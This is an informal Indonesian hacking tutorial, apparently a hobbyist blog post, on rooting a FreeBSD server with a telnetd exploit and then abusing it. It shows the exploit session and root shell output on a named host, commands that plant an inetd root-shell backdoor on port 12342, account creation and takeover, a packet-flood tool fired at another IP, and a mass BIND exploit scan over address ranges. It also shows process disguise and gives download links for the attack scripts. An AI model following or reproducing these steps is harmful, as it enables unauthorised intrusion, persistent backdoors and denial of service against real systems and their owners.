Hacking Root dan
Pembuatan Backdoor
- hey hey hey para pengguna scriptz, mungkinz
kalianz sudah terbiasa dalam hal mendapatkan
akses setingkat root di box online yang kalianz attact, dan pasti untuk
membawa nama comunity atau nama sendiri kalian coba untuk melakukan defacing.
ehmm...udah puaskah hanya denganz defacing doang..?? no i don't think so..uh !!
mungkin aku ndiri dulu suka banget yang namanya defacing, truz di kabarkan
kemana-mana kalo kita berhasil breaking security box online tersebut.
Tapi aku pengen
curhatz dikitz keisengan aku saat ngedapetinz box online. Sekarang aku pengenz
coba make scriptz yang ada, misal coba ke box bsd ajah yah, ambil contoh
free-bsd, inih misal loh, janganz protez kalo yang ngerasa hal inih menjijikanz
mah yah...pliz pliz pliz...
Alat yang bisa di
siapkan :
1. shell-unix
kalianz.
2. script buat
attackingnyah, dalam hal inih aku coba telnetd-bsd.c
3. marlboro light,
bagi kalianz yang merokok. Haruz marlboro light, hehehe... *kiddingz*
4. coklatz cadburyz,
es milo, mp3-player, MIrc-clientz, Yahoo-messenger... hihihi buatz ngilanginz
suntukz ajah kok.
5. your brain
ofcourse.
Ok pas kita dapet
target, kita coba test apakah mreka vulnerable atau tidak dengan cara sbb:
[root@purepero
.bash]# ./FAKE httpd ./tel -c ns.kuaiqu.com 7350854 - x86/bsd telnetd remote
root by zip, lorian, smiler and scut.
check: PASSED, using
16mb mode
Ternyata vulner
euy..hihihi, kita coba breaking ajah yukz pake brute force..!!
[root@purepero
.bash]# ./FAKE httpd ./tel -f ns.kuaiqu.com 7350854 - x86/bsd telnetd remote
root by zip, lorian, smiler and scut.
check: PASSED, using
16mb mode
#################################
ok baby, times are
rough, we send 16mb traffic to the remote telnet daemon process, it will spill
badly. but then, there is no other way, sorry...
## setting populators
to populate heap address space
## number of setenvs
(dots / network): 31500
## number of walks
(percentage / cpu): 496140750
##
## the percentage is
more realistic than the dots ;)
percent
|--------------------------------------------------------| ETA |
99.37%
|....................................................... | 00:00:16 | ##
sleeping for 10 seconds to let the process recover ## ok, you should now have a
root shell ## as always, after hard times, there is a reward...
command: ÿý%uname -a
; id ; hostname
FreeBSD ns.kuaiqu.com
4.2-RELEASE FreeBSD 4.2-RELEASE #0: Thu Dec 21 23:24:49 CST 2000
awa@ns.kuaiqu.com:/usr/src/sys/compile/KUAIQU i386
uid=0(root)
gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff),
31(guest) ns.kuaiqu.com
Hoooaaammmm....
akhirnyah nembuz juga dah.. mo deface? hihihihi, ah nakalz banget seeh, kita
coba cara yang jahatz yuk ..!! kita bikinz backdoor ajah duluw. Oh iya, aku
coba pake backdoor port ajah, walau gak smua comand shell bisa di lakukan, tapi
untuk ngejalanin script-script nakalz bisa kok...
isengz bikinz
backdoor :
ps ax | grep inetd
ps: warning:
/var/run/dev.db: No such file or directory
135 ?? Is 0:02.24
inetd -wW
72448 ?? Is 0:00.29
/usr/sbin/inetd -wW
79721 ?? Is 0:00.27
/usr/sbin/inetd --help
echo "semutz
12342/tcp" >> /etc/services
echo "dial
stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf kill -HUP
135
wah dah jadi dah
backdoor kita, coba ajah skarangz telnet ke target sesuai port yang kalianz add
tadi, yaitu port 12342. Nama service ama port bisa kalianz ganti sesuai
keinginanz kalianz kok. Oh iya, untuk upload file-file scriptz kalianz kan
butuh user di box tersebut, kalo aku biasanyah adduser atawa ganti name
user+passwd user yang udah ada..hihihi...
kalo mo adduser :
pw useradd -g whell
-d /home/semutz -s /usr/local/bin/tcsh
atau
pw useradd semutz
kalo mo ganti name
user+passwd-nyah :
pw usermod erica -l
semutz
passwd semutz
Untuk lengkapnya coba
baca manualnyah di /etc/adduser.conf ajah yah untuk free-bsd..hehe.. nah
setelah selesai, buruan upload script/tool nakal kalianz ke user tadi, dan
compile secepatnyah..[haruz kurangz dari 10 menit] kalo udah berharap sajah
semoga user name yang kalianz add/ganti tadi gak di ketahui ama si empunya
box.. kalo misalnyah terhapuz, kalianz masih bisa login lewat backdoor yang
kalianz add tadi. Ok misal kalianz mo coba akses lewat backdoor, coba telnet ke
backdoor yang di add tadi :
[root@purepero /]#
telnet ns.kuaiqu.com 12342 Trying 202.106.127.106... Connected to
ns.kuaiqu.com. Escape character is '^]'.
sh: can't access tty;
job control turned off
# id ; uname -a ;
hostname ;
uid=0(root)
gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff),
31(guest)
FreeBSD ns.kuaiqu.com
4.2-RELEASE FreeBSD 4.2-RELEASE #0: Thu Dec 21 23:24:49 CST 2000
awa@ns.kuaiqu.com:/usr/src/sys/compile/KUAIQU i386
ns.kuaiqu.com
: not found
#
dan skarangz coba
ajah jalaninz script/tool nakal kalianz, misal ajah aku mo coba isengz kirim
packet ke IP musuh...hihihi, btw aku gak cari musuh loh, inih
cumanz isengz doang
kok.. aku coba jalankan ajah scriptz-nyah : # ./FAKE httpd ./tembak
202.95.156.178 ;
--------------------------------------------
packetkiddies eh??
--------------------------------------------
nya mana? ngga ada
sasarannya tuh mas..
: not found
#
# ./FAKE httpd
./tembak -h 202.95.156.178 ;
--------------------------------------------
packetkiddies eh??
--------------------------------------------
SIAP!!!!
PASUKANNNNN!!! TEMBAK 202.95.156.178 di port 22
SIAPIN pelornya 45
^C
#
nah udah launched deh
paketnyah, kebetulan yang aku pake inih dia kirim 2 Mb tiap sending secara
default, kecil kok, gak ngrusak..hihi..tapi yang barusan aku lakukan timing-nyah
gak terhingga, jadi kirim secara terus menerus. Lalu coba deh ping IP tadi
lewat dos atawa lewat shell unix kalianz, gimana hasilnyah? dan misal dia ada
di IRC, liatz sajah quit msg dia...hihihi.. Oh iya, kalo udah selesey isengnyah
tekan ajah Ctrl+c, hal inih berguna untuk menghindari packet yang berlebihan
dan eksistensi rooted box kalianz. Ada juga script yang bisa sending seluruh
bandwidth yang di punyai box online tersebut, kalianz bisa cari di internet
banyak kok.
Mo coba jalaninz
script lainnyah..?? bisa juga kok, coba ajah jalanin mass-attacking bind,
statdx, lpd, atau wuftpd. yang mo aku coba skarangz mass-attacking bind deh :
# ./FAKE httpd
./luckscan-a --help ;
Usage: ./luckscan-a
<a-block> <port> [b-block] [c-block]
: not found
# ./FAKE httpd
./luckscan-a 211 53 159 ;
We are trying to root
the server 211.194.27.227
Version ...
Moving onto another
server...
We are trying to root
the server 211.194.44.230
Version ...
Moving onto another
server...
We are trying to root
the server 211.194.81.2
Version 8.1.2 ...
frame ptr=0xbffff800 adr=bffff64e ofs=102 port=05f8 connected! sent!
nah pas kalianz
dapatkan promt sepertih inih, coba tekan <enter> 2x lalu 'uname -a ; id ;
hostname' apa yang kalianz lihatz ? hihihi... ya udah kerja lagih sanah, mo
adduser, backdoor, rename user+passwd, defacing, eggdrop, psybnc atau yang
laennyah terserah..hihihi.. kalo dah ngerasa puas di box baru inih, tekan sajah
Ctrl+c, dan mass-attacking tadi jalan kembali sebagai mana mestinyah...
We are trying to root
the server 211.194.119.2
Version ...
Moving onto another
server...
We are trying to root
the server 211.194.140.2
Version 8.2.3-REL ...
Moving onto another
server...
We are trying to root
the server 211.194.144.241
Version 8.1.2 ...
system cannot be exploited
Moving onto another
server...
We are trying to root
the server 211.194.157.19
Version 8.2.2-P5 ...
system does not seem to be a vulnerable linux Moving onto another server... We
are trying to root the server 211.196.70.155 Version 8.1.2 ... frame
ptr=0xbffffc00 adr=bffffa7e ofs=54 port=1043 connected! sent!
hooaaammm...dapet lagih...sialanz, kerja
lagih dah...hihihi.. Ok udah gituh dulu ajah, silakanz coba coba ajah sendiri.
Oh iya, pasti ada yang tanya, kenap aku pake faked httpd buat jalaninz
scriptz...hehehhe, soale ituh bukanz box aku, jadi kudu tersamarkan
aktipitasku, kalo gak mah, bisa kena kill kita atau gak gak awet dah box-nyah..
Walah, kok malah ngajarinz nakalz yakz.. yang jelas inih artikelz harap di baca
ama para admin ajah, kalo sebenernyah di box kalianz bisa terjadi apa sajah
tanpa sepengetahuanz kalianz... *watch out*
daaaaagghhhh...
nb:
1. Moga ajah inih
cuman sebagai teman ber-internet kalian ajah, jangan di coba kalo gak mau
nanggung resiko yang gak kalianz ketahuinz nantinyah.. dan kerjakanz dalam
waktu secepat mungkinz. 2. Usahakan selalu berbagi sebisa kalianz bagi yang dah
perfect. 3. Bagi para admin, sering seringlah check keberadaan trafic box anda.
4. Tanda ';' harus di ikut sertakan pada saat kalianz akses lewat backdoor
port.
5. Aku nyedia-inz
script buat mass-attacking bind, mass-attacking statdx, ama mass-attacking lpd
doangz, yang laennyah mohon maap sebelomnyah gak boleh di distribusikan, harap
di mengerti.
6. Bagi yang mau
tanya lebih lanjut bisa kalianz tanyakanz ke aku atawa anak anak di
#indosniffing, kita sudah jarang defacing karena lebih menyukai mempelajari isi
dari OS-nya, karena kemungkinan kecil instal OS-nya di kost makanyah aku
belajar dari box online hasil isengz ajah..hihihi...
7. PALING PENTINGZ
KALIANZ PELAJARINZ SELUK BELUK OS YANG KALIANZ MO ATTACK DULU, AGAR TIDAK
KESUSAHAN PAS KALIANZ MENDAPATKAN BOX ONLINE YANG SECURITY-NYAH LEMAH
!!!!!!!!!!
terimakasih aku buat:
- #indosniffing,
kalianz bukanz hanya temanz chating, tapi kalianz nganggep smua keluarga dan
gak ada beda, aku suka ituh.
- #indofreebsd,
#indolinux, #deface-team, #b@yochatz, #britishroom, #jasakom #sunsolaris
- vokalisku yunni,
marlboro light, cadburyz, aqua, mp3 list-ku, mba'ku [tanti, dinda, naddya, ayi,
yuli], komputerku si kompi.
- yang jelaz smuanyah
yang udah nemeninz aku sejak lahir ampe skarangz ini ...hihihi..kayak say thx
di cover kaset yakz..
- makasih juga buatz
*** Resolved 148.223.110.67 to customer-148-223-110-67.uninet.net.mx yang udah
ngasih ijinz aku akses root di box anda ... hihihihi...
script mass-attacking
bisa di lihatz di :
-
http://www.rocketpunch-ent.com/masslpd.tar,
http://www.rocketpunch-ent.com/bindscan.c, http://www.rocketpunch-ent.com/lucstatdx.c